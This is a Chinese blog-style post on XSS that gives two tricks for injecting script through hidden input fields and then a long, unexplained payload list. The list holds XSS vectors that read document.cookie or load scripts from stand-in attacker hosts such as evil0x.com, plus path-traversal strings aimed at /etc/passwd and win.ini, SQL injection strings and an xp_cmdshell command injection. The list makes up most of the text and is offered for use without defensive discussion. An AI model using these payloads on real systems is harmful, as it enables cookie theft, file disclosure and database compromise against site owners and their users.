xss漏洞
2015-12-15 10:54
274 查看
input hidden属性的xss 突破技巧:
1、使用expression突破1 | <input type=hidden style=`x:expression(alert(/waitalone.cn/))`> |
2、使用accesskey突破
1 | <input type= "hidden" accesskey= "X" onclick= "alert(/waitalone.cn/)" > |
3、利用图片中插入代码来突破
详情请参考:http://jklmnn.de/imagejs/
这种方法,没有验证成功,请其它小伙伴补充吧。。。
参考文章:
https://twitter.com/xssvector/status/235986789041598464
http://blog.portswigger.net/2015/11/xss-in-hidden-input-fields.html
http://jklmnn.de/imagejs/doc.html
‘><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(‘XSS’)%3C/script%3E
<script>alert(‘XSS’)</script>
<img src=”javascript:alert(‘XSS’)”>
%0a%0a<script>alert(\”Vulnerable\”)</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(‘Vulnerable’);</script>
<script>alert(‘Vulnerable’)</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(‘Vulnerable’)</script>
a/
a?<script>alert(‘Vulnerable’)</script>
“><script>alert(‘Vulnerable’)</script>
‘;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’–&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.evil0x.com/http://www.evil0x.com/http://www.evil0x.com/http://www.evil0x.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
”;!–“<XSS>=&{()}
<IMG src=”javascript:alert(‘XSS’);”>
<IMG src=javascript:alert(‘XSS’)>
<IMG src=JaVaScRiPt:alert(‘XSS’)>
<IMG src=JaVaScRiPt:alert(“XSS”)>
<IMG src=javascript:alert(‘XSS’)>
<IMG src=javascript:alert(‘XSS’)>
<IMG
src=javascript:alert('XSS')>
<IMG src=”jav ascript:alert(‘XSS’);”>
<IMG src=”jav ascript:alert(‘XSS’);”>
<IMG src=”jav ascript:alert(‘XSS’);”>
“<IMG src=java\0script:alert(\”XSS\”)>”;’ > out
<IMG src=” javascript:alert(‘XSS’);”>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<BGSOUND src=”javascript:alert(‘XSS’);”>
<br size=”&{alert(‘XSS’)}”>
<LAYER src=”http://www.evil0x.com/a.js”></layer>
<LINK REL=”stylesheet” href=”javascript:alert(‘XSS’);”>
<IMG src=’vbscript:msgbox(“XSS”)’>
<IMG src=”mocha:”>
<IMG src=”livescript:”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
<IFRAME src=javascript:alert(‘XSS’)></IFRAME>
<FRAMESET><FRAME src=javascript:alert(‘XSS’)></FRAME></FRAMESET>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE=”behaviour: url(‘http://www.how-to-hack.org/exploit.html’);”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
<IMG STYLE=’xss:expre\ssion(alert(“XSS”))’>
<STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>
<STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A class=”XSS”></A>
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
<BASE href=”javascript:alert(‘XSS’);//”>
getURL(“javascript:alert(‘XSS’)”)
a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘XSS’);”;eval(a+b+c+d);
<XML src=”javascript:alert(‘XSS’);”>
“> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><“
<SCRIPT src=”http://xss.ha.ckers.org/xss.jpg”></SCRIPT>
<IMG src=”javascript:alert(‘XSS’)”
<!–#exec
cmd=”/bin/echo ‘<SCRIPT SRC'”–><!–#exec cmd=”/bin/echo
‘=http://xss.ha.ckers.org/a.js></SCRIPT>'”–>
<IMG src=”http://www.evil0x.com/somecommand.php?somevariables=maliciouscode”>
<SCRIPT a=”>” src=”http://www.evil0x.com/a.js”></SCRIPT>
<SCRIPT =”>” src=”http://www.evil0x.com/a.js”></SCRIPT>
<SCRIPT a=”>” ” src=”www.evil0x.com/a.js”></SCRIPT>
<SCRIPT “a=’>'” src=”www.evil0x.com/a.js”></SCRIPT>
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT src=”http://www.evil0x.com/a.js”></SCRIPT>
<A href=http://www.evil0x.com://www.evil0x.com/ogle.com/>link</A>
admin’–
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”a
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Apache Commons Pool 故事一则
- 你得知道这3个最基础的APP技术框架
- Cassandra监控 - OpsCenter手册
- mysql 流程控制语句
- PyQt5系列教程(三)用py2exe进行程序打包
- java 时间戳与日期字符串相互转换
- 老码农教你学英语----阿冬专栏!!!
- 查看linux中某个端口(port)是否被占用(netstat,lsof)
- 优秀的R语言免费图书
- 弹出窗口demo
- 作为一个.net程序猿,需要掌握这些有点前途的人才,一些开发---Shinepans
- PLSQL大数据生成规则
- 网站中使用中文个性字库字体--@font-face解决方案探索 l(转)
- Nginx 优化思路
- HTTP 代理原理及实现(二)
- H5开发web前端开发设计师哪儿学好
- 遇到的问题2
- Clear IIS cache
- jquery attr()方法
- css的简写规范